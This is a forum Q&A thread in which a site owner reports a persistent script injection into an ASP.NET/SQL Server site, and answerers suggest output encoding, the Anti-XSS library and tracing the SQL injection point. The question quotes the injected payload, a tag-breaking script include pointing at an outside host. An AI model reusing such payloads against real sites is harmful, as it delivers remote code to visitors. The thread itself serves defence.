XSS Attack on the ASP.NET Website [closed]

Question

I am in a very big trouble. Please help!!!!!!!!!!

My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >.

My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.

Please help.

Thanks in advance!!!!!!

Answer 1

When you render the text from the database you can use two ways to avoid this script.

1. User Server.HtmlEncode(DataFromDatabase);
2. Use the Microsoft Anti-Cross dll library that have a similar function with more options.

Last MS Anti-XSS library now is 3.1.
How to using video

How they pass this script.

1. On the contact or other forms.
2. On the browser reference on the statistics and when they browse your site, you keep a log about this and when you go to see this log the script is running.

Hope this help.

Answer 2

Shut down the site. Your server may or may not be screwed now.

You have to find out where the changes are coming from - Database or File system

If it's the DB then you may be ok, someone is probably using sql injection. Set permissions so that the DB cannot be updated by the site for now until you find the SQL INJECTION point.

If it's your file system then you probably need to clear and reset the site. They are in and you won't get rid of them. Find your entry point, but it will be hard.